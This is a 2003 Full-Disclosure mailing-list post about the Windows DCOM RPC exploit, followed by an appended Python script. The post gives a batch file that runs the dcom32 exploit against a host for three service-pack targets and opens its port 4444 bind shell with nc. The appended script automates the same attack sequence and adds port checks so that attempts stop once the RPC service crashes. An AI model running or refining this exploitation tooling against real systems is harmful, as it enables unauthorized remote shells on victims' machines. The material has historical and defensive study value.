----- Original Message -----
From: "john" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, July 28, 2003 7:42 AM
Subject: [Full-Disclosure] dcom exploit code observations
> Downloaded the revised exploit code by HD Moore and got it compiled on a
> linux box.
>
> There seem to be either some flaws in the exploit code or just a
> general instability of the rpc service.
>
> If the code is run against a vulnerable box and the SP level
> setting is not correct, it crashes the rpc service and shuts down the
> port. Restarting the service will bring it back online. If the attack is
> successful you get a nice pretty windows shell. If you exit the shell
> the rpc service again crashes.
>
> I am sure the code will be revised to eliminate these problems.
>
> John

THIS IS NOT THE CASE... this .bat works perfectly...

------------ snip -------------------
@echo on
@echo .....................................................
@echo RPC script by morning_wood
@echo ....................................................
wait
@echo ...
REM dcom32 <target> <host>: the target numbers follow the table in HD Moore's dcom.c
REM (4 = Windows 2000 SP4, 5 = Windows XP SP0, 6 = Windows XP SP1).
REM After each attempt nc connects to the exploit's bind shell on 4444 and blocks
REM until that shell is closed; only then does the script move on to the next target.
REM cmd.exe has no built-in "wait": unless a wait.exe is on the PATH, that line just
REM prints "not recognized" and the script carries on without pausing.
@echo trying XP Service Pack 0
dcom32 5 %1
nc -v -n %1 4444
wait
@echo trying XP Service Pack 1
dcom32 6 %1
nc -v -n %1 4444
wait
@echo trying 2K Service Pack 4
dcom32 4 %1
nc -v -n %1 4444
wait
@echo ........... have fun
wait
@echo bye now
exit
-------- snip -------------------

w00d

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
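The posted .bat fires the three targets one after another with nothing in between, while John's message reports that a wrong SP guess takes the RPC service down and closes the port. The sweep below is an added example, not code from either poster: it wraps the same `dcom32 <target> <host>` command line with a TCP liveness check on port 135 before moving to the next target, and checks for the bind shell on 4444 that the .bat's `nc` line expects. It assumes a `dcom32` binary on the PATH whose target numbers follow HD Moore's dcom.c table (4 = Windows 2000 SP4, 5 = XP SP0, 6 = XP SP1); the `SimulatedHost` class is a constructed stand-in so the sequencing can be run and checked offline.

```python
"""Target sweep for dcom32 with an RPCSS liveness check between attempts.

Added example, not code from the original thread. Assumptions (not in the
post): a `dcom32 <target> <host>` binary on the PATH using the target
numbering of HD Moore's dcom.c (4 = Windows 2000 SP4, 5 = XP SP0,
6 = XP SP1), and a bind shell on TCP/4444 after a successful run, which is
what the posted .bat's `nc -v -n %1 4444` line connects to.
"""
import socket
import subprocess
import sys
from typing import Callable, List, Optional, Sequence, Tuple

RPC_PORT = 135      # RPCSS endpoint mapper the exploit talks to
SHELL_PORT = 4444   # bind shell the .bat connects to with nc

# Same order the posted .bat uses: XP SP0, XP SP1, then Windows 2000 SP4.
DEFAULT_SWEEP: List[Tuple[int, str]] = [
    (5, "Windows XP SP0"),
    (6, "Windows XP SP1"),
    (4, "Windows 2000 SP4"),
]


def port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if a TCP connect to host:port completes within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def build_command(target_id: int, host: str) -> List[str]:
    """The command line the .bat runs for one target (dcom32 assumed on PATH)."""
    return ["dcom32", str(target_id), host]


def sweep(
    targets: Sequence[Tuple[int, str]],
    probe: Callable[[int], bool],
    attempt: Callable[[int], None],
) -> Tuple[str, List[int]]:
    """Try targets in order, stopping as soon as a shell appears or RPCSS dies.

    probe(port)  -> whether the host currently accepts connections on port
    attempt(tid) -> run one exploit attempt against target id tid
    Both are injected so the sequencing can be exercised offline.
    Returns (outcome, target ids actually tried).
    """
    tried: List[int] = []
    if not probe(RPC_PORT):
        return "rpc-down-before-start", tried
    for target_id, _label in targets:
        attempt(target_id)
        tried.append(target_id)
        if probe(SHELL_PORT):
            return "shell", tried
        if not probe(RPC_PORT):
            # A wrong SP guess took RPCSS down (the behaviour John reports);
            # further attempts would only hit a closed port.
            return "rpc-crashed", tried
    return "exhausted", tried


class SimulatedHost:
    """Constructed stand-in for a target: tracks only RPCSS and shell state."""

    def __init__(self, rpc_up: bool = True, crash_on: Optional[int] = None,
                 shell_on: Optional[int] = None) -> None:
        self.rpc_up = rpc_up
        self.shell_up = False
        self.crash_on = crash_on   # target id that "crashes" RPCSS
        self.shell_on = shell_on   # target id that "succeeds"

    def attempt(self, target_id: int) -> None:
        if target_id == self.shell_on:
            self.shell_up = True
        elif target_id == self.crash_on:
            self.rpc_up = False

    def probe(self, port: int) -> bool:
        return self.rpc_up if port == RPC_PORT else self.shell_up


def main(argv: List[str]) -> int:
    if len(argv) != 2:
        print("usage: sweep.py <host> | --simulate", file=sys.stderr)
        return 2
    if argv[1] == "--simulate":
        host = SimulatedHost(crash_on=6)   # second target kills RPCSS
        outcome, tried = sweep(DEFAULT_SWEEP, host.probe, host.attempt)
    else:
        target = argv[1]
        outcome, tried = sweep(
            DEFAULT_SWEEP,
            lambda port: port_open(target, port),
            lambda tid: subprocess.run(build_command(tid, target), check=False),
        )
    print(f"outcome={outcome} tried={tried}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Against a real host the script only reports whether 4444 answered; connecting to the shell is still done with `nc` as in the .bat. The point of the 135 probe is the stop condition: once RPCSS has gone away, the remaining targets are not tried, and the operator knows the service needs restarting before anything else will get a response.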